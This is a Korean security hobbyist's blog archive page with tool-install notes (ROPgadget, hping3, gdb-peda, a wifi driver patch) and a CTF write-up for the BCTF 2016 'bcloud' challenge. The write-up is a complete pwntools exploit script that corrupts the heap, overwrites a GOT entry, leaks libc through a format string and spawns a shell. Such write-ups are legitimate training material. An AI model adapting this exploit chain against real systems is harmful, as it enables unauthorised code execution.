ROPgadget Tool

MEMO 2016. 3. 31. 23:21

"Capstone 여기가 의심되는 경우는 apt-get install capstone --upgrade 를 실시해봄 ""

ROPgadget Tool

This tool lets you search your gadgets on your binaries to facilitate your ROP exploitation. ROPgadget supports ELF/PE/Mach-O format on x86, x64, ARM, ARM64, PowerPC, SPARC and MIPS architectures. Since the version 5, ROPgadget has a new core which is written in Python using Capstone disassembly framework for the gadgets search engine - The older version can be found in the Archives directory but it will not be maintained.

Install

If you want to use ROPgadget, you have to install Capstone first.

For the Capstone's installation on nix machine:

$ sudo pip install capstone

Capstone supports multi-platforms (windows, ios, android, cygwin...). For the cross-compilation, please refer to the https://github.com/aquynh/capstone/blob/master/COMPILE.TXT file.

After Capstone is installed, ROPgadget can be used as a standalone tool:

$ ROPgadget.py

Or installed into the Python site-packages library, and executed from $PATH.

$ python setup.py install
$ ROPgadget

Or installed from PyPi

$ pip install ropgadget
$ ROPgadget


#####

https://github.com/JonathanSalwan/ROPgadget/


'MEMO' 카테고리의 다른 글

strace 바이너리 모음  (0) 2016.06.25
ARM gdb-peda 설치  (0) 2016.04.01
hping3  (0) 2016.03.26
14.04에서 rtl8188cus 모듈 컴파일 하기  (0) 2016.03.23
Ubuntu 14 버전에서 peda 설치 에러  (0) 2016.03.21
Posted by goldpapa
,

[pwnable.kr]uaf

2016. 3. 26. 21:41

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

hping3

MEMO 2016. 3. 26. 09:04

### 참조

http://c8korea.blogspot.kr/2013/01/hping.html

http://www.hping.org/download.php

3계층이상의 다양한 패킷을 생성할 수 있고, 네트워크에 대한 보안감사, 방화벽 테스팅을 수행할 수 있다.

주요기능 : 방화벽 룰 테스트, 포트스캐닝, 네트워크 성능 테스트, TCP/IP stack auditing, OS핑거프린팅

설치 #pkg-get install hping3



'MEMO' 카테고리의 다른 글

ARM gdb-peda 설치  (0) 2016.04.01
ROPgadget Tool  (0) 2016.03.31
14.04에서 rtl8188cus 모듈 컴파일 하기  (0) 2016.03.23
Ubuntu 14 버전에서 peda 설치 에러  (0) 2016.03.21
자주가는 링크  (0) 2015.06.07
Posted by goldpapa
,

#  I agree with him

 

Re: 13.04에서 rtl8188cus 모듈 컴파일 하기

글올린이: oseb » 2013/12/09 월 2:55 pm

리얼텍 rtl8188C_8192C_usb_linux_v4.0.2_9000.20130911.tar.gz이 좀 되었지만 나왔는데
이게 이전 패치도 안 먹고 커널 3.11이상에서 역시 빌드가 되지 않더군요

갱신된 아치에 있는 패치는 돌아는 가는데 커널에 있는 거랑 용호상박 거북이보다 못한 속도더군요
어떻게 찾아보니 이전 패치를 이어 받아서 고친게 있어서, 사용중인 14.04의 커널 3.12에서 해보니 잘 돌아가네요

패치가 없길래 뭔가 크게 바뀌었나 싶어 오랜만에 diff -urN 해보니 위치만 조금 조금되었을 뿐이네요
사실 그게 소스 능력이지만 말입니다. ;)

사용한 패치된 소스: https://github.com/pvaret/rtl8192cu-fixes
원래 realtek에서 8188cu/8192cu 받아서 driver 압축파일 풀어 패치하고 사용하면 됩니다
patch -p1 < 패치파일


### ref

https://forum.ubuntu-kr.org/viewtopic.php?f=9&t=24718


### POINT

Hardware switch disabled -> CMOS -> WiFi (use -> disable) -> OK !!!



'MEMO' 카테고리의 다른 글

ARM gdb-peda 설치  (0) 2016.04.01
ROPgadget Tool  (0) 2016.03.31
hping3  (0) 2016.03.26
Ubuntu 14 버전에서 peda 설치 에러  (0) 2016.03.21
자주가는 링크  (0) 2015.06.07
Posted by goldpapa
,

bctf2016-bcloud

CTF 2016. 3. 21. 23:30


w00t@ubuntu32svr:~/bctf/bcloud$ cat a.py


#!/usr/bin/env python

from pwn import *


addr_plt_printf         = 0x080484d0

addr_got_atoi           = 0x0804b03c


offset_libc_IO_stderr   = 0x001aa960

offset_libc_system      = 0x00040190


def New(cmn, size, data):

    cmn.recvuntil('>>\n')

    cmn.sendline('1')

    cmn.recvuntil('content:\n')

    cmn.sendline(str(size))

    cmn.recvuntil('content:\n')

    if size>0:

        cmn.sendline(data)


def Edit(cmn, id_num, data):

    cmn.recvuntil('>>\n')

    cmn.sendline('3  ')

    cmn.recvuntil('id:\n')

    cmn.sendline(str(id_num))

    cmn.recvuntil('content:\n')

    cmn.sendline(data)


s = process('./bcloud.9a3bd1d30276b501a51ac8931b3e43c4')


s.recvuntil('name:\n')

s.send('a'*0x40)

buf = s.recv(0x44)

print hexdump(buf)

buf = s.recvuntil('! ')

print hexdump(buf)


addr_heap  = buf[:-2]

addr_heap  = u32(addr_heap)-8


print('addr_heap      : 0x%08x' % addr_heap)


buf=s.recvuntil('Org:\n')

print hexdump(buf)


s.send('a'*0x40)


buf=s.recvuntil('Host:\n')

print hexdump(buf)


s.sendline(p32(0xffffffff))


New(s, addr_got_atoi-0x4-(addr_heap+0xe0)-0x8, None)

    

exploit_st1  = p32(0xdeadbeef)

exploit_st1 += p32(addr_plt_printf)

New(s, 0x100, exploit_st1)


s.recvuntil('>>\n')

s.sendline('%24$p')

addr_libc_IO_stderr = int(s.recv(10),16)

addr_libc_base      = addr_libc_IO_stderr - offset_libc_IO_stderr

addr_libc_system    = addr_libc_base + offset_libc_system

print('addr_libc_base : 0x%08x' % addr_libc_base)


exploit_st2  = p32(0xdeadbeef)

exploit_st2 += p32(addr_libc_system)

    

Edit(s, 0, exploit_st2)

    

s.recvuntil('>>\n')

s.sendline('/bin/sh')


s.interactive()




### 참조

http://shift-crops.hatenablog.com/entry/2016/03/21/171249

http://www.hackerschool.org/HS_Boards/data/Lib_system/dfb_leon.txt (double free 원재아빠)

'CTF' 카테고리의 다른 글

[tum ctf 2016] haggis - crpyto  (0) 2016.10.03
[SCTF 2016] pwn2 한땀 한땀 ROP read /bin/sh  (0) 2016.09.16
[tokyo 2016] ReverseBox  (0) 2016.09.12
[tokyo ctf 2016]greeting  (0) 2016.09.06
[plaidCTF]butterfly  (0) 2016.04.19
Posted by goldpapa
,
git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
echo "DONE! debug your program with gdb and enjoy"


sudo apt-get remove gdb

wget http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_7.4-2012.02-0ubuntu2_i386.deb

sudo dpkg -i ./gdb_7.4-2012.02-0ubuntu2_i386.deb


sudo apt-get remove gdb

wget http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_7.4-2012.02-0ubuntu2_amd64.deb

sudo dpkg -i ./gdb_7.4-2012.02-0ubuntu2_amd64.deb

### 참조

http://askubuntu.com/questions/548435/trouble-compiling-gdb-with-python-2-7-support-for-gdb-peda   (힌트)

https://github.com/longld/peda    (다운로드)

https://hwchen18546.wordpress.com/2014/12/17/linux-install-gdb-peda-in-ubuntu-14-04/   (원리)


'MEMO' 카테고리의 다른 글

ARM gdb-peda 설치  (0) 2016.04.01
ROPgadget Tool  (0) 2016.03.31
hping3  (0) 2016.03.26
14.04에서 rtl8188cus 모듈 컴파일 하기  (0) 2016.03.23
자주가는 링크  (0) 2015.06.07
Posted by goldpapa
,

pwn-pwnable [ringzer0team]

2015. 6. 14. 00:38

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

chal_rpc-pwnable [ringzer0team]

2015. 6. 11. 23:05

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.